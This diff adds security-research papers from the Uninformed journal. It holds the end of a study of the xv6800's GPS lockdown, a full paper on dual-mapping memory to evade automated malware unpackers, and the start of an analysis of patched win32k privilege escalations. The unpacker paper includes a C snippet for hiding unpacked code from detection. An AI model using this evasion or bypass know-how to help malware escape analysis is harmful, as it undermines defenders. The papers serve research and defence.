integrated gpsOne hardware, the bulk of these checks were relatively easy to
|
||||
overcome. In fact, the principle barriers to the GPS unlocking projects were
|
||||
a lack of viable debugging tools for the platform, and an unfamiliarity with
|
||||
Windows Mobile on the part of the author.
|
||||
|
||||
Nevertheless, several improvements could have been made to improve the
|
||||
resilience of the lockdown system.
|
||||
|
||||
- Deny assisted GPS availability at the PDE if the user's account is not
|
||||
provisioned for GPS, or if the privacy policy configured time of day
|
||||
restrictions are not met. Because the security and lockdown checks are
|
||||
implemented client-side on the xv6800, they are relatively easily bypassable
|
||||
by third party applications. However, if the device is capable of performing
|
||||
a standalone GPS location fix, blocking assisted GPS access will not provide
|
||||
a hard defense.
|
||||
- Require code signing from a Verizon Wireless CA for all applications loaded
|
||||
on the device. Users are, however, unlikely to purchase a device configured
|
||||
in such a matter, as expensive smartphone-class devices are often sold under
|
||||
the expectation that third party programs will be easily loadable.
|
||||
- Moving enforcement checks for operations such as time of day requirements for
|
||||
the user's desired location privacy policy into the radio firmware and out of
|
||||
the operating system environment. The radio firmware environment is
|
||||
significantly closer to a "black box" than the operating system which runs on
|
||||
the application core of the xv6800. Furthermore, if the software loader on
|
||||
the xv6800 were secured and locked down, the radio firmware could be made
|
||||
significantly more proof against unauthorized modifications. One could
|
||||
envision a system wherein the radio firmware communicates with the carrier's
|
||||
network out-of-band (with respect to the general-purpose operating system
|
||||
loaded on the device) to determine when it had been authorized by the user to
|
||||
provide location information to applications running on the device.
|
||||
|
||||
The client-side checks on the GPS lockdown system are likely a heritage of the
|
||||
fact that VZ Navigator and LBSDriver.dll appear to be more or less ports from
|
||||
BREW-based "dumb phones", where the application environment is more tightly
|
||||
controlled by code signing requirements. The Windows Mobile operating
|
||||
environment is significantly different in this respect, however.
|
||||
|
||||
Additionally, the author would submit that, from the perspective of attempting
|
||||
to safeguard users from unauthorized harvesting of their location data (a key
|
||||
reason cited by Verizon Wireless with respect to the certification process
|
||||
needed for an application to become approved for location-aware functionality),
|
||||
a hardware switch to enable or disable the GPS hardware on the device would be
|
||||
a far better investment. In fact, the xv6800 already possesses a hardware
|
||||
switch for 802.11 functionality; if this was instead changed to enable or
|
||||
disable the gpsOne chipset in future smartphone designs, users could be assured
|
||||
that their location information would be truly secure.
|
||||
|
||||
6. Debugging and Development Challenges on Windows Mobile and the xv6800.
|
||||
|
||||
Windows Mobile has a severely reduced set of standard debugging tools as
|
||||
compared to the typically highly rich debugging environment available on most
|
||||
Windows-derived systems. This greatly complicated the process of understanding
|
||||
the underlying implementation details of the GPS lockdown system.
|
||||
|
||||
The author had access to two debuggers that could be used on the xv6800 at the
|
||||
time of this writing: the Visual Studio 2005 debugger, and the IDA Pro 5.1
|
||||
debugger. Both programs have serious issues in and of their own respective
|
||||
rights.
|
||||
|
||||
Unfortunately, there does not appear to be any support for WinDbg, the author's
|
||||
preferred debugging tool, when using Windows CE-based systems, such as Windows
|
||||
Mobile. Although WinDbg can open ARM dump files (and ARM PE images as a dump
|
||||
file), and can disassemble ARM instructions, there is no transport to connect
|
||||
it to a live process on an ARM system.
|
||||
|
||||
The relatively immature state of debugging tools for the Windows Mobile
|
||||
platform was a significant time consumer in the undertaking of this project.
|
||||
|
||||
6.1. Limitations of the Visual Studio Debugger
|
||||
|
||||
Visual Studio 2005 has integrated support for debugging Windows Mobile-based
|
||||
applications. However, this support is riddled with bugs, and the quality of
|
||||
the debugging experience rapidly diminishes if one does not have symbols and
|
||||
binaries for all images in the process being debugged present on the debugger
|
||||
machine. In particular, the Visual Studio 2005 debugger seems to be unable to
|
||||
disassemble at any location other than the current pc register value without
|
||||
having symbols for the containing binary available. (In the author's
|
||||
experience, attempting such a feat will fail with a complaint that no code
|
||||
exists at the desired address.)
|
||||
|
||||
Additionally, there seems to be no support for export symbols on the Windows
|
||||
Mobile debugger component of Visual Studio 2005. This, coupled with the lack
|
||||
of freely-targetable disassembly support, often made it difficult to identify
|
||||
standard API calls from the debugger. The author recommends falling back to
|
||||
static disassembly whenever possible, as available static disassembly tools,
|
||||
such as IDA Pro 5.1 Advanced or WinDbg provide a superior user experience.
|
||||
|
||||
6.2. Limitations of the IDA Pro 5.1 Debugger
|
||||
|
||||
Although IDA Pro 5.1 supports debugging of Windows Mobile-based programs, the
|
||||
debugger has several limitations that made it unfortunately less practical than
|
||||
the Visual Studio 2005 debugger. Foremost, it would appear that the debugger
|
||||
does not support suspending and breaking into a Windows Mobile target without
|
||||
the Windows Mobile target voluntarily breaking in (such as by hitting a
|
||||
previously defined breakpoint).
|
||||
|
||||
In addition, the default security policy configuration on the device needed to
|
||||
be modified in order to enable the debugger to connect at all (see note [3]).
|
||||
|
||||
6.3. Replacing a Firmware-baked Execute-in-place Module
|
||||
|
||||
Windows Mobile supports the concept of an execute in place (or XIP) module.
|
||||
Such an executable image is stored split up into PE sections on disk (and does
|
||||
not contain a full image header). XIP modules are "baked" into the firmware
|
||||
image, and cannot be overwritten without flashing the OS firmware on the
|
||||
device. Conversely, it is not possible to simply copy an XIP module off of the
|
||||
device and on to a conventional storage medium.
|
||||
|
||||
The advantage of XIP "baked" modules comes into play when one considers the
|
||||
limited amount of RAM available on a typical Windows Mobile device. XIP
|
||||
modules are pre-relocated to a guaranteed available base address, and do not
|
||||
require any runtime alterations to their backing memory when mapped. As a
|
||||
result, XIP modules can be backed entirely by ROM and not RAM, decreasing the
|
||||
(scarce) RAM that must be devoted to holding executable code.
|
||||
|
||||
It is possible to supersede an XIP "baked" module without flashing the OS image
|
||||
on the xv6800, however. This involves a rather convoluted procedure, which
|
||||
amounts to the following steps, for a given XIP module residing in a particular
|
||||
directory:
|
||||
|
||||
- First, rename the replacement module such that it has a filename which does
|
||||
not conflict with any files present in the directory containing the XIP
|
||||
module to supersede.
|
||||
- Next, copy the renamed replacement module into the directory containing the
|
||||
desired XIP module to supersede.
|
||||
- Finally, rename the replacement module to have the same filename as the
|
||||
desired XIP module.
|
||||
|
||||
Deleting the filename associated with the superseded XIP module will revert the
|
||||
device back to the ROM-supplied XIP module. This property proves beneficial in
|
||||
that it becomes easy to revert back to stock operating system-supplied modules
|
||||
after temporarily superseding them.
|
||||
|
||||
6.4. Import Address Table Hooking Limitations
|
||||
|
||||
One avenue considered during the development of the replacement gpsapi.dll
|
||||
module was to hook the import address tables (IATs) of programs utilizing
|
||||
gpsapi.dll.
|
||||
|
||||
Unfortunately, import table hooking is a significantly more complicated affair
|
||||
on Windows Mobile-based platforms than on standard Windows. The image headers
|
||||
for a loaded image are discarded after the image has been mapped, and the IAT
|
||||
itself is often relocated to be non-contiguous with the rest of the image.
|
||||
|
||||
This relocation is possible as there appears to be an implicit restriction
|
||||
that all references to an IAT address on ARM PE images must indirect through a
|
||||
global variable that contains the absolute address of the desired IAT address.
|
||||
As a result, there are no relative references to the IAT, and thus absolute
|
||||
address references may be fixed up via the aid of relocation information. It
|
||||
is not clear to the author what the purpose for this relocation of the IAT
|
||||
outside the normal image confines serves on Windows Mobile for non-XIP modules
|
||||
that are loaded into device RAM.
|
||||
|
||||
Furthermore, the HMODULE of an image does not equate to its load base address
|
||||
on Windows Mobile. One can retrieve the real load base address of a module on
|
||||
Windows Mobile via the GetModuleInformation API. This is a significant
|
||||
departure from standard Windows.
|
||||
|
||||
Due to these limitations, the author elected not to pursue IAT hooking for the
|
||||
purposes of the GPS unlocking project. Although there is code publicly
|
||||
available to cope with the relocation of an image's IAT, it appears to be
|
||||
dependent on kernel data structures that the author did not have a conveniently
|
||||
available and accurate definition for these structures corresponding to the
|
||||
Windows Mobile kernel shipping on the xv6800.
|
||||
|
||||
7. Conclusion
|
||||
|
||||
Locking down the gpsOne hardware on the xv6800 such that it can only be
|
||||
utilized by Verizon Wireless certified and approved applications can be seen in
|
||||
two lights. One could consider such actions an anti-competitive move, designed
|
||||
to lock out third party programs from having the opportunity to compete with
|
||||
VZ Navigator. However, such a reasoning is fairly questionable, given that
|
||||
other carriers in the United States (particularly GSM-based carriers) typically
|
||||
fully support third party GPS-enabled applications on their devices. As
|
||||
consumers expect more full-featured and advanced devices, locking down devices
|
||||
to only carrier-approved functionality is becoming an increasingly large
|
||||
competitive liability for companies seeking to differentiate their networks
|
||||
and devices in today's saturated mobile phone markets.
|
||||
|
||||
Furthermore, Verizon Wireless's currently shipping location-enabled application
|
||||
for the xv6800, VZ Navigator, remains competitive (by virtue of features such
|
||||
as turn-by-turn voice navigation, traffic awareness, and automatic re-routing)
|
||||
even if the built-in GPS hardware on the xv6800 were to be unlocked for
|
||||
general-purpose use. Freely available navigation programs lack these features,
|
||||
and commercial applications are based off of a different pricing model than the
|
||||
periodic monthly fee model used by VZ Navigator at the time of this article's
|
||||
writing.
|
||||
|
||||
A more reasonable (although perhaps misguided) rationale for locking down the
|
||||
gpsOne hardware is to protect users from having their location harvested or
|
||||
tracked by malicious programs. Unfortunately, the relatively open nature of
|
||||
Windows Mobile 6, and a lack of particularly effective privilege-level
|
||||
isolation on Windows Mobile 6 after any unsigned code is permitted to run both
|
||||
conspire to greatly diminish the effectiveness of the protection schemes that
|
||||
are implemented on the xv6800.
|
||||
|
||||
Whether this is a legitimate concern or not remains, of course, up for debate,
|
||||
but it is clear that the lockdown system as present on the xv6800 is not
|
||||
particularly effective against blocking access to un-approved third party
|
||||
applications.
|
||||
|
||||
Future releases of Windows Mobile claim support for a much more effective
|
||||
privilege isolation model that may provide true security from unprivileged,
|
||||
malicious programs. However, in currently shipping devices, the operating
|
||||
system cannot be relied upon to provide this protection. Relying on security
|
||||
through obscurity to implement lockdown and protection schemes may then seem
|
||||
attractive, but such mechanisms rarely provide true security.
|
||||
|
||||
As mobile phone advance to becoming more and more powerful devices, in effect
|
||||
becoming small general-purpose computers, privacy and security concerns begin
|
||||
to gain greater relevance. With the capability to record a user's location
|
||||
and audio and environment (via built-in microphones and cameras present on
|
||||
virtually all modern-day phones), there arises the chance for a serious privacy
|
||||
breeches, especially given modern day smartphones have historically not seen
|
||||
the more vigorous level of security review that is slowly becoming more common-
|
||||
place on general purpose computers.
|
||||
|
||||
One simple and elegant potential solution to these privacy risks is to simply
|
||||
provide hardware switches to disable sensitive components, such as cameras or
|
||||
embedded GPS hardware. Keeping in mind with this philosophy, the author would
|
||||
encourage Verizon Wireless to fully open up their devices, and defer to simple
|
||||
and secure methods to allow users to manage their sensitive information, such
|
||||
as physical hardware switches.
|
||||
|
||||
|
||||
Bibliography:
|
||||
|
||||
[1] Verizon Wireless. Commercial Location Based Services.
|
||||
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSLanding.jsp; accessed October 10, 2008
|
||||
|
||||
[2] Verizon Wireless. LBS Application Questions ("What can I do to ensure that my application is accepted, and to ensure a smooth certification process?").
|
||||
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#LBSAppQues7; accessed October 10, 2008
|
||||
|
||||
[3] Daniel Álvarez. Debugging Windows Mobile 6 Applications with IDA.
|
||||
http://dani.foroselectronica.es/debugging-windows-mobile-6-applications-with-ida-69/; accessed October 10, 2008
|
||||
|
||||
[4] Microsoft. GPS Intermediate Driver Reference.
|
||||
http://msdn.microsoft.com/en-us/library/ms850332.aspx; accessed October 10, 2008
|
||||
|
||||
[5] Microsoft. GPSOpenDevice.
|
||||
http://msdn.microsoft.com/en-us/library/bb202113.aspx; accessed October 10, 2008
|
||||
|
||||
[6] Microsoft. GPSGetPosition.
|
||||
http://msdn.microsoft.com/en-us/library/bb202050.aspx; accessed October 10, 2008
|
||||
|
||||
[7] Verizon Wireless. LBS Application Questions ("Can the user change their privacy settings?").
|
||||
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#GenQues16; accessed October 10, 2008
|
||||
|
||||
[8] Microsoft. GetModuleFileName Function (Windows).
|
||||
http://msdn.microsoft.com/en-us/library/ms683197(VS.85).aspx; accessed October 10, 2008
|
||||
|
||||
[9] Microsoft. CryptImportKey Function (Windows).
|
||||
http://msdn.microsoft.com/en-us/library/aa380207(VS.85).aspx; accessed October 11, 2008
|
||||
|
||||
[10] Microsoft. Example C program: Imprtoing a Plaintext Key (Windows).
|
||||
http://msdn.microsoft.com/en-us/library/aa382383(VS.85).aspx; accessed October 11, 2008
|
||||
|
231
uninformed/10.2.txt
Normal file
231
uninformed/10.2.txt
Normal file
|
@ -0,0 +1,231 @@
|
|||
Using dual-mappings to evade automated unpackers
|
||||
10/2008
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
Abstract: Automated unpackers such as Renovo, Saffron, and Pandora's Bochs
|
||||
attempt to dynamically unpack executables by detecting the execution of code
|
||||
from regions of virtual memory that have been written to. While this is an
|
||||
elegant method of detecting dynamic code execution, it is possible to evade
|
||||
these unpackers by dual-mapping physical pages to two distinct virtual address
|
||||
regions where one region is used as an editable mapping and the second region
|
||||
is used as an executable mapping. In this way, the editable mapping is
|
||||
written to during the unpacking process and the executable mapping is used to
|
||||
execute the unpacked code dynamically. This effectively evades automated
|
||||
unpackers which rely on detecting the execution of code from virtual addresses
|
||||
that have been written to.
|
||||
|
||||
Update: After publishing this article it was pointed out that the design of
|
||||
the Justin dynamic unpacking system should invalidate evasion techniques that
|
||||
assume that the unpacking system will only trap on the first execution attempt
|
||||
of a page that has been written to. Justin counters this evasion technique
|
||||
implicitly by enforcing W ^ X such that when a page is executed from for the
|
||||
first time, it is marked as executable but non-writable. Subsequent write
|
||||
attempts will cause the page be marked as non-executable and dirty. This
|
||||
logic is enforced across all virtual addresses that are mapped to the same
|
||||
physical pages. This has the potential to be an effective countermeasure,
|
||||
although there are a number of implementation complexities that may make it
|
||||
difficult to realize in a robust fashion, such as those related to the
|
||||
duplication of handles and the potential for race conditions when
|
||||
transitioning page protections.
|
||||
|
||||
1. Background
|
||||
|
||||
There are a number of automated unpackers that rely on detecting the execution
|
||||
of dynamic code from virtual addresses that has been written to. This section
|
||||
provides some background on the approaches taken by these unpackers.
|
||||
|
||||
1.1 Malware Normalization
|
||||
|
||||
Christodorescu et al. described a method of normalizing programs which focuses
|
||||
on eliminating obfuscation[2]. One of the components of this normalization
|
||||
process consists of an iterative algorithm that is meant to produce a program
|
||||
that is not self-generating. In essence, this algorithm relies on detecting
|
||||
dynamic code execution to identify self-generated code. To support this
|
||||
algorithm, QEMU was used to monitor the execution flow of the input program as
|
||||
well as all memory writes that occur. If execution is transferred to an
|
||||
address that has been written to, it is known that dynamic code is being
|
||||
executed.
|
||||
|
||||
1.2 Renovo
|
||||
|
||||
Renovo is similar to the malware normalization technique in that it uses an
|
||||
emulated environment to monitor program execution and memory writes to detect
|
||||
when dynamic code is executed[3]. Renovo makes use of TEMU as the execution
|
||||
environment for a given program. When Renovo detects the execution of code
|
||||
from memory that was written to in the context of a given process, it extracts
|
||||
the dynamic code and attempts to find the original entry point of the unpacked
|
||||
executable.
|
||||
|
||||
1.3 Saffron
|
||||
|
||||
Saffron uses two approaches to dynamically unpack executables[5]. The first
|
||||
approach involves using Pin's dynamic instrumentation facilities to monitor
|
||||
program execution and memory writes in a direction similar to the emulated
|
||||
approaches described previously. The second approach makes use of hardware
|
||||
paging features to detect when execution is transferred to a memory region.
|
||||
Saffron detects the first time code is executed from a page, regardless of
|
||||
whether or not it is writable, and logs information about the execution to
|
||||
support extracting the unpacked executable. This can be seen as a more
|
||||
generic version of the technique used by OllyBonE which focused on using
|
||||
paging features to monitor a specific subset of the address space[8].
|
||||
OmniUnpack also uses an approach that is similar to Saffron[4].
|
||||
|
||||
1.4 Pandora's Bochs
|
||||
|
||||
Pandora's Bochs uses techniques similar to those used by Christodorescu and
|
||||
Renovo[1]. Specifically, Pandora's Bochs uses Bochs as an emulation environment
|
||||
in which to monitor program execution and memory writes to detect when dynamic
|
||||
code is executed.
|
||||
|
||||
1.5 Justin
|
||||
|
||||
Justin is a recently developed dynamic unpacking system that was presented at
|
||||
RAID 2008 after the completion of the initial draft of this paper[9]. Justin
|
||||
differs from previous work in that is uses hardware non-executable paging
|
||||
support to enforce W ^ X on virtual address regions. When an execution
|
||||
attempt occurs, an exception is generated and Justin determines whether or not
|
||||
the page being executed from was written to previously. The authors of Justin
|
||||
correctly identified the evasion technique described in the following section
|
||||
and have attempted to design their system to counter it. Their approach
|
||||
involves verifying that the protection attributes are the same across all
|
||||
virtual addresses that map to the same physical pages. This should be an
|
||||
effective countermeasure, although there is certainly room for attacking
|
||||
implementation weaknesses, should any exist.
|
||||
|
||||
2. Dual-mapping
|
||||
|
||||
The automated unpackers described previously rely on their ability to detect
|
||||
the execution of dynamic code from virtual addresses that have been written
|
||||
to. This implicitly assumes that the virtual address used to execute code
|
||||
will be equal to an address that was written to previously. While this
|
||||
assumption is safe in most circumstances, it is possible to use features
|
||||
provided by the Windows memory manager to evade this form of detection.
|
||||
|
||||
The basic idea behind this evasion technique involves dual-mapping a set of
|
||||
physical pages to two virtual address regions. The first region is considered
|
||||
an editable mapping and the second region is considered an executable mapping.
|
||||
The contents of the unpacked executable are written to the editable mapping
|
||||
and later executed using the executable mapping. Since both mappings are
|
||||
associated with the same physical pages, the act of writing to the editable
|
||||
mapping indirectly alters the contents of the executable mapping. This evades
|
||||
detection by making it appear that the code that is executed from the
|
||||
executable mapping was never actually written to. This technique is
|
||||
preferable to writing the unpacked executable to disk and then mapping it into
|
||||
memory as doing so would enable trivial unpacking and detection.
|
||||
|
||||
Implementing this evasion technique on Windows can be accomplished using fully
|
||||
supported user-mode APIs. First, a pagefile-backed section (anonymous memory
|
||||
mapping) must be created using the CreateFileMapping API. The handle returned
|
||||
from this function must then be passed to MapViewOfFile to create both the
|
||||
editable and executable mappings. Finally, the dynamic code must be unpacked
|
||||
into the editable mapping through whatever means and then executed using the
|
||||
executable mapping. This is illustrated in the code below:
|
||||
|
||||
ImageMapping = CreateFileMapping(
|
||||
INVALID_HANDLE_VALUE, NULL,
|
||||
PAGE_EXECUTE_READWRITE | SEC_COMMIT,
|
||||
0, CodeLength, NULL);
|
||||
|
||||
EditableBaseAddress = MapViewOfFile(ImageMapping,
|
||||
FILE_MAP_READ | FILE_MAP_WRITE,
|
||||
0, 0, 0);
|
||||
ExecutableBaseAddress = MapViewOfFile(ImageMapping,
|
||||
FILE_MAP_EXECUTE | FILE_MAP_READ | FILE_MAP_WRITE,
|
||||
0, 0, 0);
|
||||
|
||||
CopyMemory(EditableBaseAddress,
|
||||
CodeBuffer, CodeLength);
|
||||
|
||||
((VOID (*)())ExecutableBaseAddress)();
|
||||
|
||||
The example code provides an illustration of using this technique to execute
|
||||
dynamic code. This technique should also be fairly easy to adapt to the
|
||||
unpacking code used by existing packers. One consideration that must be made
|
||||
when using this technique is that relocations must be applied to the unpacked
|
||||
executable relative to the base address of the executable mapping. With that
|
||||
said, the relocation fixups themselves must be applied to the editable mapping
|
||||
in order to avoid tainting the executable mapping.
|
||||
|
||||
An additional evasion technique may also be necessary for certain dynamic
|
||||
unpackers that monitor code execution from any virtual address, regardless of
|
||||
whether or not it was previously written to. This is the case with Saffron's
|
||||
paging-based automated unpacker[5]. For performance reasons, Saffron only logs
|
||||
information the first time code is executed from a page. If the contents of
|
||||
the code changes after this point, Saffron will not be aware of them. This
|
||||
makes it possible to evade this form of unpacking by executing innocuous code
|
||||
from each page of the executable mapping. Once this has finished, the actual
|
||||
unpacked executable can be extracted into the editable mapping and then
|
||||
executed normally. This evasion technique should also be effective against
|
||||
Justin due to the fact that Justin does not trap on subsequent execution
|
||||
attempts from a given virtual address[9].
|
||||
|
||||
While these evasion techniques are expected to be effective, they have not
|
||||
been experimentally verified. There are a number of reasons for this. No
|
||||
public version of Pandora's Bochs is currently available. However, its author
|
||||
has indicated that this technique should be effective. Renovo provides a web
|
||||
interface that can be used to analyze and unpack executables. No data was
|
||||
received after uploading an executable that simulated this evasion technique.
|
||||
The authors of Saffron have indicated that they expected this technique to be
|
||||
effective.
|
||||
|
||||
3. Weaknesses
|
||||
|
||||
Perhaps the most significant weakness of the dual-mapping technique is that it
|
||||
is not capable of evading all automated unpackers. For example, dynamic
|
||||
unpacking techniques that strictly focus on control flow transfers, such as
|
||||
PolyUnpack[7] and ParaDyn[6], should still be effective. However, this
|
||||
weakness could be overcome by incorporating additional evasion techniques,
|
||||
such as those mentioned in cited work[7].
|
||||
|
||||
Automated unpackers could also attempt to invalidate the dual-mapping
|
||||
technique by monitoring writes and code execution in terms of physical
|
||||
addresses rather than virtual addresses. This would be effective due to the
|
||||
the fact that both the editable and executable virtual mappings would refer to
|
||||
the same physical addresses. However, this approach would likely require a
|
||||
better understanding of operating system semantics since memory may be paged
|
||||
in and out at any time.
|
||||
|
||||
4. Conclusion
|
||||
|
||||
The dual-mapping technique can be used by packers to evade automated unpacking
|
||||
tools that rely on detecting dynamic code execution from virtual addresses
|
||||
that have been written to. While this evasion technique is expected to be
|
||||
effective in its current form, it should be possible for automated unpackers
|
||||
to adapt to handle this scenario such as by monitoring writes to physical
|
||||
pages or by better understanding operating system semantics that deal with
|
||||
virtual memory mappings.
|
||||
|
||||
References
|
||||
|
||||
[1] L. Boehne. Pandora's bochs: Automatic unpacking of malware.
|
||||
http://www.0x0badc0.de/PandorasBochs.pdf, Jan 2008.
|
||||
|
||||
[2] Mihai Christodorescu, Johannes Kinder, Somesh Jha, Stefan Katzenbeisser,
|
||||
and Helmut Veith. Malware normalization. Technical Report 1539, University
|
||||
of Wisconsin and Madison, Wisconsin, USA, November 2005.
|
||||
|
||||
[3] M. Gyung Kang, P. Poosankam, and H. Yin. Renovo: A hidden code extractor
|
||||
for packed executables.
|
||||
http://www.andrew.cmu.edu/user/ppoosank/papers/renovo.pdf, Oct 2007.
|
||||
|
||||
[4] L. Martignoni, M. Christodorescu, and S. Jha. Omniunpack: Fast and generic
|
||||
and and safe unpacking of malware.
|
||||
http://www.acsac.org/2007/papers/151.pdf, December 2007.
|
||||
|
||||
[5] Danny Quist and Valsmith. Covert debugging: Circumventing software
|
||||
armoring techniques. BlackHat USA, Aug 2007.
|
||||
|
||||
[6] K. Roundy. Analysis and instrumentation of packed binary code.
|
||||
http://www.cs.wisc.edu/condor/PCW2008/paradyn_presentations/roundy-packedCode.ppt,
|
||||
Apr 2008.
|
||||
|
||||
[7] P. Royal, M. Haplin, D. Dagon, R. Edmonds, and W. Lee. Polyunpack:
|
||||
Automating the hidden-code extraction of unpack-executing malware. 22nd
|
||||
Annual Computer Security Applications Conference, Dec 2005.
|
||||
|
||||
[8] J. Stewart. Ollybone. 2006.
|
||||
|
||||
[9] Fanglu Guo, Peter Ferrie, and Tzi cker Chiueh. A study
|
||||
of the packer problem and its solutions. In RAID, pages
|
||||
98.115, 2008.
|
867
uninformed/10.3.txt
Normal file
867
uninformed/10.3.txt
Normal file
|
@ -0,0 +1,867 @@
|
|||
Analyzing local privilege escalations in win32k
|
||||
10/2008
|
||||
mxatone
|
||||
mxatone@gmail.com
|
||||
|
||||
Abstract: This paper analyzes three vulnerabilities that were found in
|
||||
win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a
|
||||
major component of the GUI subsystem in the Windows operating system. These
|
||||
vulnerabilities have been reported by the author and patched in MS08-025[1]. The
|
||||
first vulnerability is a kernel pool overflow with an old communication
|
||||
mechanism called the Dynamic Data Exchange (DDE) protocol. The second
|
||||
vulnerability involves improper use of the ProbeForWrite function within
|
||||
string management functions. The third vulnerability concerns how win32k
|
||||
handles system menu functions. Their discovery and exploitation are covered.
|
||||
|
||||
1) Introduction
|
||||
|
||||
The design of modern operating systems provides a separation of privileges
|
||||
between processes. This design restricts a non-privileged user from directly
|
||||
affecting processes they do not have access to. This enforcement relies on
|
||||
both hardware and software features. The hardware features protect devices
|
||||
against unknown operations. A secure environment provides only necessary
|
||||
rights by filtering program interaction within the overall system. This
|
||||
control increases provided interfaces and then security risks. Abusing
|
||||
operating system design or implementation flaws in order to elevate a
|
||||
program's rights is called a privilege escalation.
|
||||
|
||||
During the past few years, userland code and protection had been ameliorated.
|
||||
The amelioration of operating system understanding has made abnormal behaviour
|
||||
detection easier. The exploitation of classical weakness is harder than it
|
||||
was. Nowadays, local exploitation directly targets the kernel. Kernel local
|
||||
privilege escalation brings up new exploitation methods and most of them are
|
||||
certainly still undiscovered. Even if the Windows kernel is highly protected
|
||||
against known attack vectors, the operating system itself has a lot of
|
||||
different drivers that contribute to its overall attack surface.
|
||||
|
||||
On Windows, the graphical user interface (GUI) is divided into both
|
||||
kernel-mode and user-mode components. The win32k.sys driver handles user-mode
|
||||
requests for graphic rendering and window management. It also redirects
|
||||
DirectX calls on to the appropriate driver. For local privilege escalation,
|
||||
win32k represents an interesting target as it exists on all versions of
|
||||
Windows and some features have existed for years without modifications.
|
||||
|
||||
This article presents the author's work on analyzing the win32k driver to find
|
||||
and report vulnerabilities that were addressed in Microsoft bulletin
|
||||
MS08-025[1]. Even if the patch adds an overall protection layer, it concerns
|
||||
three reported vulnerabilities on different parts of the driver. The Windows
|
||||
graphics stack is very complex and this article will focus on describing some
|
||||
of win32k's organization and functionalities. Any reader who is interested in
|
||||
this topic is encouraged to look at MSDN documentation for additional
|
||||
information.
|
||||
|
||||
The structure of this paper is as follows. In chapter , the win32k driver
|
||||
architecture basics will be presented with a focus on vulnerable contexts.
|
||||
Chapter will detail how each of the three vulnerabilities was discovered and
|
||||
exploited. Finally, chapter will discuss possible security improvements for
|
||||
the vulnerable driver.
|
||||
|
||||
2) Win32k design
|
||||
|
||||
Windows is based on a graphical user interface and cannot work without it. Only
|
||||
Windows Serer 2008 in server core mode uses a minimalist user interface but
|
||||
share the exact same components that typical user interfaces. The win32k driver
|
||||
is a critical component in the graphics stack exporting more than 600 functions.
|
||||
It extends the System Service Descriptor Table (SSDT) with another
|
||||
table called (W32pServiceTable). This driver is not as big as the
|
||||
main kernel module (ntoskrnl.exe) but its interaction with the
|
||||
user-mode is just as important. The service table for win32k contains less than
|
||||
300 functions depending on the version of Windows. The win32k driver commonly
|
||||
transfers control to user-mode with a user-mode callback system that will be
|
||||
explained in this part. The interface between user-mode modules and
|
||||
kernel-mode drivers has been built in order to facilitate window creation and
|
||||
management. This is a critical feature of Windows which may explain why
|
||||
exactly the same functions can be seen across multiple operating system
|
||||
versions.
|
||||
|
||||
2.1) General security implementation
|
||||
|
||||
The most important part of a driver in terms of security is how it validates
|
||||
user-mode inputs. Each argument passed as a pointer must be a valid user-mode
|
||||
address and be unchangeable to avoid race conditions. This validation is often
|
||||
accomplished by comparing a provided address with an address near the base of
|
||||
kernel memory using functions such as ProbeForRead and ProbeForWrite. Input
|
||||
contained within pointers is also typically cached in local variables
|
||||
(capturing). The Windows kernel design is very strict on this part. When you
|
||||
look deeper into win32k's functions, you will see that they do not follow the
|
||||
same strict integrity verifications made by the kernel. For example, consider
|
||||
the following check made by the Windows kernel (translated to C):
|
||||
|
||||
NTSTATUS NTAPI NtQueryInformationPort(
|
||||
HANDLE PortHandle,
|
||||
PORT_INFORMATION_CLASS PortInformationClass,
|
||||
PVOID PortInformation,
|
||||
ULONG PortInformationLength,
|
||||
PULONG ReturnLength
|
||||
)
|
||||
|
||||
[...] // Prepare local variables
|
||||
|
||||
if (AccesMode != KernelMode)
|
||||
{
|
||||
try {
|
||||
// Check submitted address - if incorrect, raise an exception
|
||||
ProbeForWrite( PortInformation, PortInformationLength, 4);
|
||||
|
||||
if (ReturnLength != NULL)
|
||||
{
|
||||
if (ReturnLength > MmUserProbeAddress)
|
||||
*MmUserProbeAddress = 0; // raise exception
|
||||
|
||||
*ReturnLength = 0;
|
||||
}
|
||||
|
||||
} except(1) { // Catch exceptions
|
||||
return exception_code;
|
||||
}
|
||||
}
|
||||
|
||||
[...] // Perform actions
|
||||
|
||||
We can see that the arguments are tested in a very simple way before doing
|
||||
anything else. The ReturnLength field implements its own verification which
|
||||
relies directly on MmUserProbeAddress. This variable marks the separation
|
||||
between user-mode and kernel-mode address spaces. In case of an invalid
|
||||
address, an exception is raised by writting in this variable which is
|
||||
read-only. The ProbeForRead and ProbeForWrite functions verifications routines
|
||||
raised an exception if an incorrect address is encounter. However, the win32k
|
||||
driver does not allows follow this pattern:
|
||||
|
||||
BOOL NtUserSystemParametersInfo(
|
||||
UINT uiAction,
|
||||
UINT uiParam,
|
||||
PVOID pvParam,
|
||||
UINT fWinIni)
|
||||
|
||||
[...] // Prepare local variables
|
||||
|
||||
switch(uiAction)
|
||||
{
|
||||
case SPI_1:
|
||||
// Custom checks
|
||||
break;
|
||||
case SPI_2:
|
||||
size = sizeof(Stuct2);
|
||||
goto prob_read;
|
||||
case SPI_3:
|
||||
size = sizeof(Stuct3);
|
||||
goto prob_read;
|
||||
case SPI_4:
|
||||
size = sizeof(Stuct4);
|
||||
goto prob_read;
|
||||
case SPI_5:
|
||||
size = sizeof(Stuct5);
|
||||
goto prob_read;
|
||||
case SPI_6:
|
||||
size = sizeof(Struct6);
|
||||
|
||||
prob_read:
|
||||
ProbeForRead(pvParam, size, 4)
|
||||
|
||||
[...]
|
||||
}
|
||||
|
||||
[...] // Perform actions
|
||||
|
||||
This function is very complex and this example presents only a small part of
|
||||
the checks. Some parameters need only classic verification while others
|
||||
implement their own. This elaborate code can create confusion which improves
|
||||
the chances of a local privilege escalation. The issues comes from unordinary
|
||||
kernel function that handles multiple features at the same time without
|
||||
implementing a standardized function prototype. The Windows kernel solved this
|
||||
issue on NtSet* and NtQuery* functions by using two simple arguments. The
|
||||
first argument is a classical buffer and the second argument is its size. For
|
||||
example, the NtQueryInformationPort function will check the buffer in a
|
||||
generic way and then only verify that the size correspond to the specified
|
||||
feature. The win32k design implementation ameliorates GUI development but make
|
||||
code review very difficult.
|
||||
|
||||
2.2) KeUsermodeCallback utilization
|
||||
|
||||
Typical interaction between user-mode and kernel-mode is done via syscalls. A
|
||||
user-mode module may request that the kernel execute an action and return
|
||||
